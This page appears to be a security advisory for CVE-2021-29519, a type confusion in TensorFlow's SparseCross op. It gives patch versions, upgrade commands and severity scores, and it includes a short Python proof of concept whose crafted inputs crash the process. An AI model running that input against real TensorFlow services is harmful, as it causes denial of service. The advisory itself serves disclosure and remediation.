GHSA-772j-h9xw-ffp5 BIT-tensorflow-2021-29519 CVE-2021-29519 PYSEC-2021-156 PYSEC-2021-447 PYSEC-2021-645
CHECK-fail in SparseCross due to type confusion
- Severity
- 0.0 / 10
- Low · CVSS 4.0
- Exploit chance (EPSS)
- 0.19%
- Chance of exploitation in the next 30 days. Higher than 8.57% of scored vulnerabilities.
- Known exploited
- No
- Not in CISA's catalog
- Weakness
- CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')
- Fix
- Available
- 3 packages have a fixed version
Description
Impact
The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service:
import tensorflow as tf
hashed_output = False
num_buckets = 1949315406
hash_key = 1869835877
out_type = tf.string
internal_type = tf.string
indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64)
indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64)
indices = [indices_1, indices_2]
values_1 = tf.constant([0], dtype=tf.int64)
values_2 = tf.constant([72], dtype=tf.int64)
values = [values_1, values_2]
batch_size = 4
shape_1 = tf.constant([4, 122], dtype=tf.int64)
shape_2 = tf.constant([4, 188], dtype=tf.int64)
shapes = [shape_1, shape_2]
dense_1 = tf.constant([188, 127, 336, 0], shape=[4, 1], dtype=tf.int64)
dense_2 = tf.constant([341, 470, 470, 470], shape=[4, 1], dtype=tf.int64)
dense_3 = tf.constant([188, 188, 341, 922], shape=[4, 1], dtype=tf.int64)
denses = [dense_1, dense_2, dense_3]
tf.raw_ops.SparseCross(indices=indices, values=values, shapes=shapes, dense_inputs=denses, hashed_output=hashed_output,
num_buckets=num_buckets, hash_key=hash_key, out_type=out_type, internal_type=internal_type)
The above code will result in a CHECK fail in tensor.cc:
void Tensor::CheckTypeAndIsAligned(DataType expected_dtype) const {
CHECK_EQ(dtype(), expected_dtype)
<< " " << DataTypeString(expected_dtype) << " expected, got "
<< DataTypeString(dtype());
...
}
This is because the implementation is tricked to consider a tensor of type tstring which in fact contains integral elements:
if (DT_STRING == values_.dtype())
return Fingerprint64(values_.vec<tstring>().data()[start + n]);
return values_.vec<int64>().data()[start + n];
Fixing the type confusion by preventing mixing DT_STRING and DT_INT64 types solves this issue.
Patches
We have patched the issue in GitHub commit b1cc5e5a50e7cee09f2c6eb48eb40ee9c4125025.
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.
Affected versions
PyPI
| Package | Vulnerable | Fixed in |
|---|---|---|
| tensorflow | < 2.1.4 |
2.1.4 |
| tensorflow | >= 2.2.0, < 2.2.3 |
2.2.3 |
| tensorflow | >= 2.3.0, < 2.3.3 |
2.3.3 |
| tensorflow | >= 2.4.0, < 2.4.2 |
2.4.2 |
| tensorflow | < 2.1.4>= 2.2.0, < 2.2.3>= 2.3.0, < 2.3.3>= 2.4.0, < 2.4.2 |
2.1.42.2.32.3.32.4.2 |
| tensorflow-cpu | < 2.1.4 |
2.1.4 |
| tensorflow-cpu | >= 2.2.0, < 2.2.3 |
2.2.3 |
| tensorflow-cpu | >= 2.3.0, < 2.3.3 |
2.3.3 |
| tensorflow-cpu | >= 2.4.0, < 2.4.2 |
2.4.2 |
| tensorflow-cpu | < 2.1.4>= 2.2.0, < 2.2.3>= 2.3.0, < 2.3.3>= 2.4.0, < 2.4.2 |
2.1.42.2.32.3.32.4.2 |
| tensorflow-gpu | < 2.1.4 |
2.1.4 |
| tensorflow-gpu | >= 2.2.0, < 2.2.3 |
2.2.3 |
| tensorflow-gpu | >= 2.3.0, < 2.3.3 |
2.3.3 |
| tensorflow-gpu | >= 2.4.0, < 2.4.2 |
2.4.2 |
| tensorflow-gpu | < 2.1.4>= 2.2.0, < 2.2.3>= 2.3.0, < 2.3.3>= 2.4.0, < 2.4.2 |
2.1.42.2.32.3.32.4.2 |
How to fix
Move to the fixed version or later with your package manager, update the lockfile, and run your tests. If the package only arrives through another dependency, upgrade that dependency first. If none of its releases pulls a fixed version yet, force the version with your package manager's override.
tensorflow PyPI → 2.1.4
- pip
pip install --upgrade "tensorflow>=2.1.4"- poetry
poetry add "tensorflow>=2.1.4"- uv
uv add "tensorflow>=2.1.4"
tensorflow-cpu PyPI → 2.1.4
- pip
pip install --upgrade "tensorflow-cpu>=2.1.4"- poetry
poetry add "tensorflow-cpu>=2.1.4"- uv
uv add "tensorflow-cpu>=2.1.4"
tensorflow-gpu PyPI → 2.1.4
- pip
pip install --upgrade "tensorflow-gpu>=2.1.4"- poetry
poetry add "tensorflow-gpu>=2.1.4"- uv
uv add "tensorflow-gpu>=2.1.4"
Severity breakdown
CVSS 4.0 0.0
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
- Attack vector
- Local
- Attack complexity
- Low
- Attack requirements
- Present
- Privileges required
- Low
- User interaction
- None
- Confidentiality (vulnerable system)
- None
- Integrity (vulnerable system)
- None
- Availability (vulnerable system)
- Low
- Confidentiality (subsequent systems)
- None
- Integrity (subsequent systems)
- None
- Availability (subsequent systems)
- None
CVSS 3.1 2.5
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L
- Attack vector
- Local
- Attack complexity
- High
- Privileges required
- Low
- User interaction
- None
- Scope
- Unchanged
- Confidentiality
- None
- Integrity
- None
- Availability
- Low
Weakness
CWE-843: Access of Resource Using Incompatible Type ('Type Confusion')
The product allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type.
References
Advisories
Other links
- github.com/tensorflow/tensorflow/security/advisories/GHSA-772j-h9xw-ffp5
- github.com/tensorflow/tensorflow/commit/b1cc5e5a50e7cee09f2c6eb48eb40ee9c4125025
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-447…
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-645…
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-156.yaml
Timeline
- Published
- Last updated by the source
- Latest EPSS score
Related advisories
| Advisory | Severity | Why it's related |
|---|---|---|
| GHSA-gjh7-xx4r-x345 TensorFlow has segfault in array_ops.upper_bound | High | Also affects tensorflow |
| GHSA-fxgc-95xx-grvq TensorFlow Denial of Service vulnerability | Medium | Also affects tensorflow |
| GHSA-93vr-9q9m-pj8p TensorFlow vulnerable to Out-of-Bounds Read in DynamicStitch | High | Also affects tensorflow |
| GHSA-qjqc-vqcf-5qvj TensorFlow vulnerable to seg fault in `tf.raw_ops.Print` | High | Also affects tensorflow |
| GHSA-7jvm-xxmr-v5cw TensorFlow vulnerable to integer overflow in EditDistance | High | Also affects tensorflow |
| GHSA-64jg-wjww-7c5w TensorFlow has Null Pointer Error in TensorArrayConcatV2 | High | Also affects tensorflow |
| GHSA-6hg6-5c2q-7rcr TensorFlow has Heap-buffer-overflow in AvgPoolGrad | High | Also affects tensorflow |
| GHSA-558h-mq8x-7q9g TensorFlow has Null Pointer Error in SparseSparseMaximum | High | Also affects tensorflow |
MergeHarbor checks every repository's dependencies against this database, ranks what matters by exploitability and reachability, routes it to the owning team and opens the fix pull request.
Check your repos with MergeHarbor